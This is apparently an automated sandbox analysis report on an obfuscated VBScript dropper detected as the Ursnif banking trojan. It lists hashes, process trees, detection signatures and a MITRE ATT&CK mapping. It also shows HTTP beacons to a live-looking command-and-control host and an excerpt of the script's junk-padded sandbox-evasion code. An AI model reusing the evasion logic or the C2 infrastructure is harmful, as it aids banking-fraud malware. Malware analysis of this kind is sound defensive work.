Loading ...

Play interactive tourEdit tour

Analysis Report 0oV5opFE4RCv.vbs

Overview

General Information

Sample Name:0oV5opFE4RCv.vbs
Analysis ID:283387
MD5:6398c206cfa397d1cac4a11692cc36a7
SHA1:b048cdeed7996f785709fa17403e3ffc026bd537
SHA256:dc4bf01e50d9506c3db81adb96050831647d50650a5349cefbf9eb651381f5c4

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
WScript reads language and country specific registry keys (likely country aware script)
Contains capabilities to detect virtual machines
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4552 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0oV5opFE4RCv.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 6312 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6100 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6632 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6304 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 3 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\duke.dxfAvira: detection malicious, Label: TR/AD.UrsnifDropper.kiiwe
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\duke.dxfVirustotal: Detection: 10%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\duke.dxfReversingLabs: Detection: 16%
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
            Source: global trafficHTTP traffic detected: GET /api1/_2BEA710c1_2Bh/T2r6BJUJQaWNLC0gufW8M/YXMXh7wy00YQ3XQN/roi2nG7DMn6F_2F/FHcK767s_2F6csKKZK/vNu_2B8Lo/_2BPDHqlOM5jKs6AmQPI/IhEdup0oMjwDY9EhZgF/d6WrafOV7lUIf2xBs5bUae/EokL8M9Sa2_2F/WXjyd_2B/nprRIOoFTuo_2F8yRcgc9mV/Pn1cx92RVq/AOEXsVZ5jdrADthNF/PULhKiT1Fpst/J0Y9Sf_2BhN/PzynmT2w5CX4i_/2FdD0HYdgp_2Fa_0A_0DB/_2BZF563CbVTBSBv/KfVhp_2Fq2J_2Bj/noL7CjwCKkJ_2FirYZ/dQrvsLWIs/s8GVCIbfqnlg3cg/wm HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/7k_2B8mbUiH51kFBwdUVd/Zd7a_2Bd_2Fa8B1t/W2qeoE0fiseq8yM/4C_2BbcVuknr4yOUVH/llcIl59j9/C_2FCa_2FhZE5ibrDyyF/_2F7EJtliCRiiG1RqNa/Dou4T0ee1p0NkVbHpISSil/TEImXGOJwrhwK/kmClxim1/nFu9dL9oMJNFcU97eAXH9fs/kGbVWmL1Yj/6ropP4k67E8w7w9nT/d2F8bA6YDYCf/_2Bm9WMAR4E/vOjGFJ80eaxwHV/9xgVg6G4XF3VoKfnqtTJ_/0A_0DZHP6Gs0hjAA/vRspXcsorp9s73Y/ViZ7TDS2Sy2FkTJXf/mbHT HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: msapplication.xml1.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x245d4ed2,0x01d686fe</date><accdate>0x245d4ed2,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml1.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x245d4ed2,0x01d686fe</date><accdate>0x245d4ed2,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml6.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml6.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml8.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml8.16.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x2462137e,0x01d686fe</date><accdate>0x2462137e,0x01d686fe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Sep 2020 14:08:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: msapplication.xml.16.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml2.16.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml3.16.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml4.16.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml5.16.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml6.16.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml7.16.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml8.16.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: 0oV5opFE4RCv.vbsInitial sample: Strings found which are bigger than 50
            Source: duke.dxf.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal96.troj.evad.winVBS@7/21@2/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0oV5opFE4RCv.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\0oV5opFE4RCv.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6312 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Lync
            Source: 0oV5opFE4RCv.vbsStatic file information: File size 1089538 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: c:\Street\Sit\Kind\41\Has\4\47\Well\43\how\Color\72\94\Melody.pdb source: wscript.exe, 00000000.00000003.388923615.000001B74881E000.00000004.00000001.sdmp, duke.dxf.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(246200227)) > 0 And levitate720 = 0) Then' point Ridgway candle707 Somers sent refract Pandanus despise peafowl dodge, 7404329 gore Morrill viviparous carport293 apologetic don incubi Disneyland Ethel McNally righteous insatiable continuant highroad Apocrypha convocate substantial detent collision seven model. 1978249 parley764 Ferguson Baptiste afire breadth91 childrearing pity853, philosophy McCormick francium peahen, palsy. callosity every pinafore typic heater twin Gouda172 physician. linemen orchard fauna adopt mustang Newman at sailor555 pneumonia amanuensis demerit Bruce Alexandre brow itch studio insignia edematous ago208 huckleberry prognosticate invest thrust lemma, violate subtrahend exhibit excess. plaguey742 snap Johnny insult communicate actinide trip Slocum whimsy nilpotent Exit FunctionREM bel Rafferty pipetting debris mantel Aitken176 codetermine Tyson Serpens899 build, matchbook720 mastermind. 4929032 cipher, tropospheric survivor oxygenate900. 1509755 Pliocene adenoma steelmake, 8199894 ivy depth821 Africa oligopoly. moribund, 953531 molybdenite929 Africa134 formal macintosh. men195 silt praise insouciant65 husband. 6578432 dextrous929 End Ifblouse198 = ((38 + (798 - (44 + (-41.0)))) - 830.0)ivxHAV = (((7 - 2.0) + (36 + 3530.0)) - 3568.0)If CreateObject("Scripting.FileSystemObject").GetFolder(mulligan).Files.Count < blouse198 ThenREM littermate niggardly mongoose themselves226 zagging gratuitous bluegrass271 citizen fluoresce jocose, 3109838 tree nourish injurious207 frost vast avert873 AZ Masonite Martinson amaranth Selkirk carbide tapir, evaluable cellophane771 allegro pinxter695 quitter Potts flounder provocation539 dun mysterious448 Theodosian, Eloise shade368REM wiremen964 focal cyclopean Copeland shant tofu. Rockwell, benchmark top Wilfred declassify tubule Jordan Alberich prosaic alleviate756 raffia. 302350 conformation Szilard stickleback sarcasm. 9357275 schemata Grimaldi sidle livre tulip Josef tongue sortie withdrew. 1408844 Sigmund loanword Starkey Leonardo158 lepidopterist twinkle agog Pierson cream. 7225090 girlish illegitimacy63 daddy438 neath citywide antarctic, Trevelyan loris, 2767450 inferno inapt shun nitty peltry Kepler rs511, Atalanta combatted passband consulate give leftward Maddox Michelin fracture treble apparition grief liquid septennial536 vinyl gander. stuffy polka aesthete358 aileron Vida courier Fulbright OConnell153 octal inferior End IfSet typeset = CreateObject("WScript.Shell")delectate = typeset.ExpandEnvironmentStrings("%USERPROFILE%") + "\Downloads\"If CreateObject("Scripting.FileSystemObject").GetFolder(delectate).Files.Count < ivxHAV Then' eke adoptive. fashion ado Giuliano position861 Kitakyushu380 diverge attributive barrack416 towel Nebuchadnezzar heard retard bunt. appertain spatlum swain. Lou854 stellar ingot887 permeate potash gauleiter miscegenation, cavort beneath Trobriand tecum feedback Fiji Paleolithic mesquite pentane750 aile365 hailstone A
            Source: initial sampleStatic PE information: section name: .text entropy: 6.83975931018

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\duke.dxfJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\duke.dxfJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\0ov5opfe4rcv.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            WScript reads language and country specific registry keys (likely country aware script)Show sources
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\duke.dxfJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 6224Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
            Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.412846909.000001B7493C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: duke.dxf.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\corolla.zip VolumeInformation
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.508934495.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508764194.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508813233.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508859904.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509125210.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509088991.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.509004405.0000000005B18000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.508968105.0000000005B18000.00000004.00000040.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection1Masquerading11OS Credential DumpingSecurity Software Discovery231Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion4LSASS MemoryVirtualization/Sandbox Evasion4Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting121NTDSSystem Information Discovery125Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing2Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.